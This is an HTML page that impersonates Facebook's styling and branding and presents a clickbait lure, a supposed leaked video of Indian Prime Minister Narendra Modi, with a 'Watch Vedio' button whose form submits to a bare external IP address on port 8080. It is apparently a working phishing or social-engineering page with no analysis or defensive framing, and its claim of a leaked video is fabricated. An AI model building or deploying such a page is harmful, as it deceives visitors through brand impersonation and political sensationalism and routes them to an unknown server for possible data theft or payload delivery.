<html>
<head>

<style>
body
{
 text-align:center;
 width:100%;
 margin:0 auto;
 padding:0px;
 font-family:"lucida grande",tahoma,verdana,arial,sans-serif;
 background: linear-gradient(white, #D3D8E8);
}
#header_wrapper
{
 width: 100%;
 min-width:996px;
 background-color:#4c66a4;
}
#header
{
 margin-top: 20%;
 width:100%;
 margin:0px auto;
 padding:0px;
 height:85px;
}
#header li
{
 list-style-type:none;
 float:left;
 text-align:left;
 color:white;
}
#header #sitename
{
 margin-top:25px;
 margin-left: 30px;
}
#header #sitename a
{
 color:white;
 text-decoration:none;
 font-size:30px;
 font-weight:900;
}


#wrapper
{
 margin:0 auto;
 padding:0px;
 text-align:center;
 width:960px;

}
#wrapper div
{
 float:left;
 font-family: helvetica, arial, sans-serif;
}
#wrapper #div1
{
 margin-top:30px;
 width:560px;
 text-align:left;
}
#wrapper #div1 p
{
 font-size:20px;
 font-family:arial;
 font-weight:bold;
 margin:0px;
 color:#0e385f;
}
#wrapper #div2
{
 margin-top:10px;
 width:390px;
 text-align:left;
}
#wrapper #div2 h1
{
 margin:0px;
 font-size:37px;
 color:#2E2E2E;
}
#wrapper #div2 p
{
 font-size:18px;
 color:#2E2E2E;
}
#wrapper #div2 li
{
 list-style-type:none;
 margin-top:10px;
}




#wrapper #div2 li input[type="submit"]
{
 width:227px;
 height:45px;
 text-align:center;
 font-size:19px;
 margin-top: 10px;
 margin-bottom: 10px;
 font-family: 'Freight Sans Bold', helvetica, arial, sans-serif !important;
 font-weight: bold !important;
 background: linear-gradient(#67ae55, #578843);
 background-color: #69a74e;
 box-shadow: inset 0 1px 1px #a4e388;
 border-color: #3b6e22 #3b6e22 #2c5115;
 border: 1px solid;
 border-radius: 5px;
 color: #fff;
 cursor: pointer;
 display: inline-block;
 position: relative;
 text-shadow: 0 1px 2px rgba(0,0,0,.5);
}


</style>
</head>
<body>


<div id="header_wrapper">
 <div id="header">
 <li id="sitename"><a href="https://www.facebook.com/">Facebook</a></li>

 </div>
</div>
<br>
<div id="wrapper">



<div id="div2">
	<form action="http://3.132.78.102:8080/Modi/">
	
		<li><h2>Watch Narendra modi leaked vedio</h2></li>
		<li><p>Check out this leaked video of P.M Narendra Modi, Before facebook delete it, </p></li>
		<li><p>This vedio is being told 1995.</p></li>

		<li><input type="submit" value=" Watch Vedio" id="btn"></li>
   </form>
</div>

</div>

<div id="footer_wrapper">


</body>
</html>